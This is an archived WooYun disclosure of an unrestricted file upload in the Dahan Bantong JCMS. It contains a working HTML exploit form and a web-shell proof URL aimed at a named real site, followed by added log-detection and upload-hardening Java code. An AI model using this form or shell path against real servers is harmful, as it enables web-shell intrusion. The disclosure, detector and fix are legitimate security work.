WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2014-09-09: Details reported to the vendor, awaiting vendor handling
2014-09-10: Vendor actively ignored the vulnerability; details opened to third-party security partners
2014-11-04: Details disclosed to core white hats and relevant domain experts
2014-11-14: Details disclosed to regular white hats
2014-11-24: Details disclosed to intern white hats
2014-12-05: Details disclosed to the public
Dahan Bantong (大汉版通) system: unrestricted file upload (getshell)
The file upload happens in /jcms/m_5_e/module/idea/opr_import_discussion.jsp. The core code is as follows:
<%
ListTable listtable = new ListTable(request);
out.println(listtable.getListTableCssJs());
sys.initSysPara(request);
String strBillStatus = Convert.getParameter(request, "fn_billstatus", "A");
jcms.entity.Merp_Pub_UserEntity userentity = UserRightBLF.getUserInfo(request);
int typeid = Convert.getParameterInt(request, "typeid", 0);
/* define variables, read form values */
String strTpl_fn_billstatus = "S"; /* save/update template -- S for new, B for update */
if (strBillStatus.equals("S")) {
    String strFilePath = application.getRealPath("") + "/jcms_files/jcms" + sys.appId + "/web" + sys.webId + "/site/module/idea/tem/upload/";
    Convert.createDirectory(strFilePath);
    CommonUploadFile upload = new CommonUploadFile(strFilePath, "");
    boolean bl = false;
    String[] strFiles = null;
    try {
        bl = upload.uploadFile(request);
    } catch (Exception e) {
    }
    String ext = upload.getFormValue("ext"); // get the format of the uploaded file
    if (bl) {
        ColumnParse cp = new ColumnParse(sys.appId, sys.webId);
        cp.setUserentity(userentity);
        String strXMLFile = "";
        strFiles = upload.getAllFileName();
        TopicBLF blf = new TopicBLF(sys.appId, sys.webId);
        if (strFiles != null) {
            for (int i = 0; i < strFiles.length; i++) {
                strXMLFile = strFilePath + strFiles[i];
                blf.doImport(strXMLFile, typeid, userentity.getVc_username());
            }
        }
    }
    String strAlter = " top.buttomFrame.right_frame.location.href='./que_discussion.jsp?typeid=" + typeid + "';\n"
        + "top.buttomFrame.left_frame.location.reload();\n"
        + "removeTB();\n";
    out.println(Convert.getAlterScript(strAlter));
    return;
}
%>
The format of the uploaded file is taken from String ext = upload.getFormValue("ext"); (the comment reads "get the format of the uploaded file"), but this value is entirely controlled by the client. The result is an arbitrary file upload.
Exploitation: save the following code as an .htm file.
<form action="http://sha.sinotrans.com/jcms/m_5_e/module/idea/opr_import_discussion.jsp?typeid=0&fn_billstatus=S" method="POST" ENCTYPE="multipart/form-data">
  <input type="hidden" name="typeid" value="0">
  <input type="hidden" name="fn_billstatus" value="S">
  <input type="hidden" name="ext" value="jsp">
  <input type="file" name="file1" />
  <input type="submit" value="Upload" id="editbutton"/>
</form>
Path: /jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/ + uploadname
Open the page and any file can be uploaded directly. After the upload, the file is located at:
/jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/ + the name of the file you uploaded
Proof of exploitation using the site http://sha.sinotrans.com:
http://sha.sinotrans.com/jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/shell.jsp
As shown in the screenshot (image not preserved).
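For teams operating this product, the following is an added detection example; it is not part of the report and not vendor code. It scans web-server access logs for the two request shapes the report describes: POSTs to opr_import_discussion.jsp and requests for .jsp/.jspx files inside the module's upload directory, which, judging from the import code above, should only ever hold XML. It assumes Common/Combined Log Format lines; the sample lines are constructed, and the class name JcmsUploadDetector is hypothetical.

```java
import java.util.ArrayList;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added detection example (hypothetical class, not JCMS code).
public class JcmsUploadDetector {
    // Common Log Format prefix: client, ident, user, [timestamp], "METHOD target protocol", status.
    private static final Pattern LOG_LINE = Pattern.compile(
        "^(\\S+) \\S+ \\S+ \\[([^\\]]+)\\] \"(\\S+) (\\S+) [^\"]*\" (\\d{3})");

    // The import handler named in the report. fn_billstatus=S may travel in the
    // POST body, which access logs do not record, so every POST to it is noted.
    private static final Pattern IMPORT_HANDLER = Pattern.compile(
        "/jcms/m_5_e/module/idea/opr_import_discussion\\.jsp");

    // The directory the handler writes to (appId and webId generalised), followed by a
    // server-executable extension. The import code only consumes XML, so a .jsp here
    // is never legitimate.
    private static final Pattern EXEC_IN_UPLOAD_DIR = Pattern.compile(
        "/jcms/jcms_files/jcms[^/]*/web\\d+/site/module/idea/tem/upload/[^?]*\\.(jsp|jspx)(\\?.*)?$",
        Pattern.CASE_INSENSITIVE);

    /** Returns one alert line per request for an executable file in the upload directory,
     *  marking whether the same client earlier POSTed to the import handler. */
    static List<String> scan(List<String> lines) {
        Set<String> importers = new HashSet<>();
        List<String> alerts = new ArrayList<>();
        for (String line : lines) {
            Matcher m = LOG_LINE.matcher(line);
            if (!m.find()) continue;   // not a recognisable access-log line
            String client = m.group(1);
            String method = m.group(3);
            String target = m.group(4);
            String status = m.group(5);
            if ("POST".equals(method) && IMPORT_HANDLER.matcher(target).find()) {
                importers.add(client);
            }
            if (EXEC_IN_UPLOAD_DIR.matcher(target).find()) {
                String context = importers.contains(client)
                    ? " (same client POSTed to the import handler earlier)" : "";
                alerts.add("ALERT " + client + " " + method + " " + target
                    + " status=" + status + context);
            }
        }
        return alerts;
    }

    public static void main(String[] args) {
        // Constructed sample lines, not real traffic; addresses are from documentation ranges.
        List<String> sample = List.of(
            "203.0.113.7 - - [05/Dec/2014:19:10:01 +0800] \"POST /jcms/m_5_e/module/idea/opr_import_discussion.jsp?typeid=0&fn_billstatus=S HTTP/1.1\" 200 512",
            "203.0.113.7 - - [05/Dec/2014:19:10:05 +0800] \"GET /jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/shell.jsp HTTP/1.1\" 200 1420",
            "198.51.100.4 - - [05/Dec/2014:19:11:00 +0800] \"GET /jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/notice.xml HTTP/1.1\" 200 3000",
            "198.51.100.4 - - [05/Dec/2014:19:12:00 +0800] \"GET /jcms/index.jsp HTTP/1.1\" 200 7000");
        scan(sample).forEach(System.out::println);
    }
}
```

Run against the constructed sample, the scan flags only the request for shell.jsp in the upload directory and notes that the same client had POSTed to the import handler; the XML fetch and the unrelated index.jsp request are not flagged. A status of 200 on such a request means the file was actually served, which is the case to treat as an incident rather than a probe.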
Remediation suggestion: strictly restrict the file types accepted by the upload.
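One way to implement that restriction, as an added example that is not Dahan Bantong / JCMS code: an allowlist check in plain Java. It assumes Java 9 or later (for Set.of) and a hypothetical class UploadPolicy. Only .xml is accepted, because the handler above passes every stored file to blf.doImport as an XML file; the extension is derived from the uploaded file's own name rather than from the client-supplied form field ext, and the stored filename is chosen by the server.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

// Added hardening example (hypothetical class, not JCMS code). Requires Java 9+ for Set.of.
public class UploadPolicy {
    // Only the type the discussion import actually consumes.
    private static final Set<String> ALLOWED_EXTENSIONS = Set.of("xml");

    /** Lower-case extension of a client-supplied filename, or "" if there is none.
     *  Any directory part (POSIX or Windows separators) is stripped first, so names
     *  such as "..\\x.jsp" or "/tmp/x.xml" are judged on their last component only. */
    static String extensionOf(String clientFileName) {
        if (clientFileName == null) return "";
        String base = clientFileName.replace('\\', '/');
        int slash = base.lastIndexOf('/');
        if (slash >= 0) base = base.substring(slash + 1);
        int dot = base.lastIndexOf('.');
        // No dot, a leading dot (".jsp"), or a trailing dot ("x.") means no usable extension.
        if (dot <= 0 || dot == base.length() - 1) return "";
        return base.substring(dot + 1).toLowerCase(Locale.ROOT);
    }

    /** True only if the real filename's extension is on the allowlist. The form field
     *  "ext" from the vulnerable handler is deliberately not consulted: it is untrusted input. */
    static boolean isAllowed(String clientFileName) {
        return ALLOWED_EXTENSIONS.contains(extensionOf(clientFileName));
    }

    /** Server-chosen storage path: a random name plus the validated extension, so the
     *  file on disk never carries an attacker-chosen name. */
    static Path storagePath(Path uploadDir, String clientFileName) {
        String ext = extensionOf(clientFileName);
        if (!ALLOWED_EXTENSIONS.contains(ext)) {
            throw new IllegalArgumentException("rejected upload type: '" + ext + "'");
        }
        return uploadDir.resolve(UUID.randomUUID() + "." + ext);
    }

    public static void main(String[] args) {
        // Upload directory as given in the report; in practice it should live outside the web root.
        Path dir = Paths.get("/jcms/jcms_files/jcms/web0/site/module/idea/tem/upload");
        String[] samples = { "discussion.xml", "shell.jsp", "..\\evil.JSP", ".jsp", "x.XML" };
        for (String s : samples) {
            String verdict = isAllowed(s)
                ? "accept, stored as " + storagePath(dir, s).getFileName()
                : "reject";
            System.out.printf("%-16s -> %s%n", s, verdict);
        }
    }
}
```

Of the constructed samples only discussion.xml and x.XML pass; shell.jsp, ..\evil.JSP and .jsp are rejected. The allowlist alone is not the whole fix: the original handler builds strFilePath from application.getRealPath(""), so the upload directory sits under the web root where the container will execute a .jsp it finds there. Storing uploads outside the document root, or at minimum configuring the container not to execute anything under that directory, removes the getshell consequence even if a check is ever bypassed.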
Severity: no impact (vendor ignored)
Ignored at: 2014-12-05 19:16
Vendor response: none.